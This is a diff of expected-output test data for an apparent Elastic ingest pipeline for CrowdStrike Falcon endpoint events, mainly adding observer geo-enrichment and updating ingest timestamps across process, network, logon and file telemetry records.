"{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"319255017313886870\",\"ContextTimeStamp\":\"1604855200.751\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemotePort\":\"2181\",\"aid\":\"ffffffffed0f41575620ab9fb25ce105\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-81f1-061cdebbd115\",\"name\":\"NetworkConnectIP6MacV5\",\"timestamp\":\"1604855200836\"}", "created": "2020-11-08T17:06:40.836Z", "kind": "event", 
@@ -7860,12 +8901,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff73164cfa9656c4caff8a2a38", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff73164cfa9656c4caff8a2a38", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:52.031Z", "ecs": { @@ -7887,7 +8937,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151219100Z", + "ingested": "2021-12-14T14:41:26.533791568Z", "original": "{\"AuthenticationId\":\"1656178821\",\"AuthenticationPackage\":\"Kerberos\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"30254389526587\",\"ContextThreadId\":\"275230771323179\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"dom1\",\"LogonId\":\"1656178821\",\"LogonServer\":\"srv1\",\"LogonTime\":\"1604855211.249\",\"LogonType\":\"5\",\"PasswordLastSet\":\"1530626210.104\",\"RemoteAccount\":\"1\",\"SessionId\":\"0\",\"UserCanonical\":\"\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"0\",\"UserName\":\"user7\",\"UserPrincipal\":\"user7@dom4.cm\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-183372\",\"aid\":\"ffffffff73164cfa9656c4caff8a2a38\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-86e3-02db1faa1327\",\"name\":\"UserIdentityV2\",\"timestamp\":\"1604855212031\"}", "created": "2020-11-08T17:06:52.031Z", "kind": "event", 
@@ -7964,12 +9014,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffbe8a46386afe80c5ef64d0b5", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0010609.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbe8a46386afe80c5ef64d0b5", + "type": "agent", + "version": "1007.3.0010609.1" }, "@timestamp": "2020-11-08T17:07:17.946Z", "ecs": { 
@@ -7989,7 +9048,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151225300Z", + "ingested": "2021-12-14T14:41:26.533791957Z", "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\System32\\\\svchost.exe -k netsvcs -p -s NetSetupSvc\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"4193986770\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"8a0a29438052faed8a2532da50455756\",\"ParentAuthenticationId\":\"999\",\"ParentProcessId\":\"2881931477041\",\"ProcessCreateFlags\":\"525324\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"8193\",\"ProcessStartTime\":\"1604842733.215\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6160\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"SessionId\":\"0\",\"SourceProcessId\":\"2881931477041\",\"SourceThreadId\":\"70316664105336\",\"Tags\":\"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297\",\"TargetProcessId\":\"2882232404222\",\"TokenType\":\"2\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"128\",\"aid\":\"ffffffffbe8a46386afe80c5ef64d0b5\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-b4f9-06e3a7e5503b\",\"name\":\"ProcessRollup2V16\",\"timestamp\":\"1604855237946\"}", "created": "2020-11-08T17:07:17.946Z", "kind": "event", 
@@ -8060,12 +9119,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffac4148947ed68497e89f3308", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffac4148947ed68497e89f3308", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T09:58:32.519Z", "file": { @@ -8091,7 +9159,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151231700Z", + "ingested": "2021-12-14T14:41:26.533792342Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"1016182570608\",\"ContextThreadId\":\"37343520154472\",\"ContextTimeStamp\":\"1604829512.519\",\"DesiredAccess\":\"1179785\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00\",\"FileObject\":\"18446670458156489088\",\"Information\":\"1\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"16777312\",\"ShareAccess\":\"5\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user11\\\\Downloads\\\\file.pptx\",\"aid\":\"ffffffffac4148947ed68497e89f3308\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RansomwareOpenFile\",\"id\":\"ffffffff-1111-11eb-9756-06fe7f8f682f\",\"name\":\"RansomwareOpenFileV4\",\"timestamp\":\"1604855242091\"}", "created": "2020-11-08T17:07:22.091Z", "kind": "alert", 
@@ -8150,12 +9218,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffffdab492a5a20cd0417395a73", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0010609.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "fffffffffdab492a5a20cd0417395a73", + "type": "agent", + "version": "1007.3.0010609.1" }, "@timestamp": "2020-11-08T17:07:54.377Z", "ecs": { 
@@ -8174,7 +9251,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151237900Z", + "ingested": "2021-12-14T14:41:26.533792728Z", "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"13532\",\"ConHostProcessId\":\"1731198143955\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"2030177841\",\"ContextData\":\"\",\"ContextProcessId\":\"1741732942772\",\"ContextThreadId\":\"28523520529271\",\"ContextTimeStamp\":\"1604855274.377\",\"CycleTime\":\"473618996\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"0\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"0\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"2\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"1406250\",\"MaxThreadCount\":\"16\",\"ModuleLoadCount\":\"72\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"1731198143955\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855154.465\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"18176\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"Suspicious
CredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"1741732942772\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-12-1-1647509123-1308660782-3901357462-3999411581\",\"UserTime\":\"781250\",\"aid\":\"fffffffffdab492a5a20cd0417395a73\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-b685-0241eaddc553\",\"name\":\"EndOfProcessV14\",\"timestamp\":\"1604855276657\"}", "created": "2020-11-08T17:07:56.657Z", "kind": "event", @@ -8270,12 +9347,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffffa474d216472f3edb73c75ed", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "fffffffffa474d216472f3edb73c75ed", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:08:37.892Z", "file": { 
@@ -8302,7 +9388,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151244100Z", + "ingested": "2021-12-14T14:41:26.533793118Z", "original": "{\"AuthenticationId\":\"895027\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1786917081743\",\"ContextThreadId\":\"31685015444484\",\"ContextTimeStamp\":\"1604855317.892\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"0000000000000000be341bb58bc5f1f2a24339010200510e\",\"FileObject\":\"18446636933702558240\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"1\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"223989\",\"TargetFileName\":\"\\\\Device\\\\Mup\\\\intranet.dev\\\\int\\\\Test.pptx\",\"TokenType\":\"1\",\"aid\":\"fffffffffa474d216472f3edb73c75ed\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"OoxmlFileWritten\",\"id\":\"ffffffff-1111-11eb-9165-067ee18a7975\",\"name\":\"OoxmlFileWrittenV11\",\"timestamp\":\"1604855329571\"}", "created": "2020-11-08T17:08:49.571Z", "kind": "event", @@ -8352,18 +9438,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 50373, 
@@ -8381,12 +9461,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff1f924e228a807ea4c0f21b0b", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff1f924e228a807ea4c0f21b0b", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:09:11.158Z", "ecs": { @@ -8408,7 +9497,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151250400Z", + "ingested": "2021-12-14T14:41:26.533793517Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"439029805661\",\"ContextThreadId\":\"273683743193497\",\"ContextTimeStamp\":\"1604855351.158\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"LocalPort\":\"50373\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffff1f924e228a807ea4c0f21b0b\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-85f5-02ab029194b9\",\"name\":\"NetworkListenIP6V5\",\"timestamp\":\"1604855351798\"}", "created": "2020-11-08T17:09:11.798Z", "kind": "event", 
@@ -8449,12 +9538,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T14:34:30.744Z", "file": { @@ -8483,7 +9581,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151256800Z", + "ingested": "2021-12-14T14:41:26.533793905Z", "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"ContextProcessId\":\"321365562189152025\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604846070.744\",\"Entitlements\":\"15\",\"SHA256HashData\":\"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d\",\"Size\":\"29646\",\"TargetFileName\":\"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc\",\"VnodeModificationType\":\"10\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"AsepFileChange\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"AsepFileChangeMacV2\",\"timestamp\":\"1604855355495\"}", "created": "2020-11-08T17:09:15.495Z", "kind": "event", 
@@ -8523,12 +9621,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffa5bd4efaa195a7132c576edc", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffa5bd4efaa195a7132c576edc", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:31.803Z", "ecs": { @@ -8549,7 +9656,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151263100Z", + "ingested": "2021-12-14T14:41:26.533794287Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"2932136\",\"ContextThreadId\":\"36157339485804\",\"ContextTimeStamp\":\"1604855191.803\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonTime\":\"\",\"PasswordLastSet\":\"\",\"UserLogonFlags\":\"1\",\"UserName\":\"user7\",\"UserSid\":\"S-1-5-10\",\"aid\":\"ffffffffa5bd4efaa195a7132c576edc\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed\",\"id\":\"ffffffff-1111-11eb-aa5a-0207e26418af\",\"name\":\"UserLogonFailedV1\",\"timestamp\":\"1604855193422\"}", "created": "2020-11-08T17:06:33.422Z", "kind": "event", @@ -8586,18 +9693,12 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 443, 
@@ -8606,18 +9707,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 49689, @@ -8636,12 +9731,21 @@ "direction": "outbound" }, "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", "serial_number": "ffffffff6854438eb4181691ec47e43d", - "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:36.669Z", "ecs": { @@ -8661,7 +9765,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151269500Z", + "ingested": "2021-12-14T14:41:26.533794738Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1858880895\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"56042872298\",\"ContextTimeStamp\":\"1604855136.669\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"LocalPort\":\"49689\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"RemotePort\":\"443\",\"aid\":\"ffffffff6854438eb4181691ec47e43d\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-a889-061944805289\",\"name\":\"NetworkConnectIP6V5\",\"timestamp\":\"1604855199798\"}", "created": "2020-11-08T17:06:39.798Z", "kind": "event", 
@@ -8703,12 +9807,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffc07b49d6b7426e970523671a", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffc07b49d6b7426e970523671a", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T16:42:35.987Z", "file": { @@ -8738,7 +9851,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151276300Z", + "ingested": "2021-12-14T14:41:26.533795298Z", "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"321382909294815631\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604853755.987\",\"Entitlements\":\"15\",\"SHA256HashData\":\"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583\",\"Size\":\"165\",\"SourceFileName\":\"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq\",\"TargetFileName\":\"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478\",\"aid\":\"ffffffffc07b49d6b7426e970523671a\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8773-06939a2f0915\",\"name\":\"NewExecutableRenamedMacV1\",\"timestamp\":\"1604855213224\"}", "created": "2020-11-08T17:06:53.224Z", "kind": "event", 
@@ -8789,12 +9902,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffffa60a47af4ebd2a76070f0d4f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa60a47af4ebd2a76070f0d4f", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T17:07:48.323Z", "ecs": { @@ -8814,7 +9936,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151282800Z", + "ingested": "2021-12-14T14:41:26.533795704Z", "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321367236803434269\",\"ContextTimeStamp\":\"1604855268.323\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"51076\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa60a47af4ebd2a76070f0d4f\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-9a50-0669ff09604d\",\"name\":\"NetworkListenIP6MacV5\",\"timestamp\":\"1604855268755\"}", "created": "2020-11-08T17:07:48.755Z", "kind": "event", 
@@ -8838,30 +9960,33 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffff6d724d38af99c628fb904626", + "type": "agent", + "version": "1007.3.0011603.1" + }, "process": { "entity_id": "1611521722601", "thread": { "id": 53405065993811 } }, + "@timestamp": "2020-11-08T17:08:00.307Z", "os": { "type": "windows" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff6d724d38af99c628fb904626", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2020-11-08T17:08:00.307Z", "ecs": { "version": "1.12.0" }, @@ -8877,7 +10002,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151289100Z", + "ingested": "2021-12-14T14:41:26.533796098Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ContextProcessId\":\"1611521722601\",\"ContextThreadId\":\"53405065993811\",\"ContextTimeStamp\":\"1604855280.307\",\"DomainName\":\"raw.githubusercontent.com\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff6d724d38af99c628fb904626\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"SuspiciousDnsRequest\",\"id\":\"ffffffff-1111-11eb-885e-02ac336efd4b\",\"name\":\"SuspiciousDnsRequestV2\",\"timestamp\":\"1604855323217\"}", "created": "2020-11-08T17:08:43.217Z", "kind": "alert", 
@@ -8901,7 +10026,13 @@ "EffectiveTransmissionClass": "3", "RequestType": "1", "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -8920,12 +10051,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff1990483499a736373600eef7", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "100.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff1990483499a736373600eef7", + "type": "agent", + "version": "100.3.0011603.1" }, "@timestamp": "2020-11-08T17:08:35.034Z", "file": { 
@@ -8943,7 +10083,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151295300Z", + "ingested": "2021-12-14T14:41:26.533796949Z", "original": "{\"ConfigBuild\":\"100.3.0011603.1\",\"ContextProcessId\":\"4492535979973\",\"ContextThreadId\":\"14023068415125\",\"ContextTimeStamp\":\"1604855315.034\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_8086\\u0026DEV_31E3\\u0026SUBSYS_080C1028\\u0026REV_03\\\\3\\u002611583659\\u00260\\u002690\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeDeviceCharacteristics\":\"131072\",\"VolumeDeviceObjectFlags\":\"134479872\",\"VolumeDeviceType\":\"8\",\"VolumeDriveLetter\":\"C:\",\"VolumeFileSystemDevice\":\"\\\\Ntfs\",\"VolumeFileSystemDriver\":\"\\\\FileSystem\\\\Ntfs\",\"VolumeFileSystemType\":\"2\",\"VolumeIsEncrypted\":\"0\",\"VolumeMountPoint\":\"\\\\??\\\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeRealDeviceName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeSectorSize\":\"512\",\"aid\":\"ffffffff1990483499a736373600eef7\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeMounted\",\"id\":\"ffffffff-1111-11eb-9be9-024459b713c5\",\"name\":\"FsVolumeMountedV6\",\"timestamp\":\"1604855329102\"}", "created": "2020-11-08T17:08:49.102Z", "kind": "event", @@ -9005,12 +10145,21 @@ "direction": "outbound" }, "observer": { - "serial_number": 